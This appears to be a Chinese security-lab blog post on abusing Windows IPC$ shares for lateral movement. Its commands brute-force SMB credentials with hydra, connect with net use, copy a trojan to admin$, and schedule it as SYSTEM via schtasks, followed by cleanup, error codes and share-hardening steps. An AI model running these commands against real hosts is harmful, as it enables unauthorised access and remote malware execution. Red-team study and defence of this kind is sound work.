点击蓝字,关注我们
日期:2023-02-09 作者:L-Center 介绍:IPC$ 共享那些事儿。
0x00 前言
IPC$(Internet process connection),是window系统让进程间通信而开放的命名管道。
IPC$共享文件服务。IPC获取目标的文件管理权限,上传生成的木马后,建立定时任务,实现横向渗透。0x01 利用
1.1 利用条件
一般情况下系统都会默认开启IPC$服务。
开放了139或445端口目标开启ipc$共享获取用户账号密码
1.2 命令
一些常用的命令:
net share #查看自己的共享net view \127.0.0.1 #查看目标共享资源net use \127.0.0.1ipc$ "" /user:"" #建立空连接net use \127.0.0.1ipc$ "password" /user:"username" #建立完整连接net use \127.0.0.1ipc$ /del #删除IPC$连接net use z: \127.0.0.1c$ #直接访问net use c: /del #删除映射的c盘net use * /del /y #删除全部连接不提示net use\去连接的IP地址ipc$ "域成员密码" /user:域名域成员账号dir \momaek.comc$copy test.exe \127.0.0.1admin$ 复制文件至目标服务器的共享目录c盘的Windows目录下copy test.exe \momaek.comc$net use \192.168.100.1ipc$ /del 删除ipc$连接
1.3 利用过程
使用工具爆破出账户名密码。
hydra -l administrator -P pwd.txt -f 192.168.30.136 smb
使用net use \192.168.30.136ipc$ "QWEqwe123" /user:"administrator"建立连接。
然后上传生成好的木马文件。
copy C:UsersUSERDesktoptest.exe \192.168.30.136admin$
也可以使用net use k: \192.168.30.136c$ /u:"administrator" "QWEqwe123"映射磁盘进行操作。
使用schtask创建计划任务。
上传生成好的木马文件会存放在c盘的Windows目录下。
schtasks /create /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test /sc minute /mo 1 /tr C:Windowstest.exe /ru system /f
查看一下计划任务。
schtasks /query /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test
拿到权限。
注意使用schtasks时会在C:WindowsTasksSchedLgU.txt留下痕迹。
利用完成后使用:
schtasks /delete /s 192.168.30.136 /u administrator /p QWEqwe123 /tn test删除计划任务。
1.3 会出现的问题
现在高版本的IPC$共享空连接的一些基础查询都会拒绝访问。
也有可能是使用的用户不是管理员权限。
发生系统错误 1219。
是因为IPC$在同一时间内,两个IP之间只允许建立一个连接。
使用net use \192.168.30.136ipc$ /del重新连接即可。
还有一些其他的问题:
错误号51 #Windows无法找到网络路径:网络有问题;错误号53 #找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤);错误号67 #找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$;错误号1792 #试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;错误号2242 #此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。
1.4 如何防范ipc$入侵
删除共享:
net share ipc$ /deletenet share admin$ /deletenet share c$ /deletenet share d$ /delete
停止server服务,但重启后会重新启动该服务。
net stop server /y
禁止C$、D$、E$一类的共享:在HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceslanmanserverparameters新建一个DOWRD值“AutoShareServer”设置为“0”。禁止ADMIN$共享:新建一个DOWRD值“AutoShareWKs”设置为“0”。
0x02 总结
以上是我对IPC$共享的一个简单总结。
免责声明:本文仅供安全研究与讨论之用,严禁用于非法用途,违者后果自负。
宸极实验室隶属山东九州信泰信息科技股份有限公司,致力于网络安全对抗技术研究,是山东省发改委认定的“网络安全对抗关键技术山东省工程实验室”。团队成员专注于 Web 安全、移动安全、红蓝对抗等领域,善于利用黑客视角发现和解决网络安全问题。
团队自成立以来,圆满完成了多次国家级、省部级重要网络安全保障和攻防演习活动,并积极参加各类网络安全竞赛,屡获殊荣。
对信息安全感兴趣的小伙伴欢迎加入宸极实验室,关注公众号,回复『招聘』,获取联系方式。
原文始发于微信公众号(宸极实验室):『红蓝对抗』IPC$ 共享的那些事儿
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论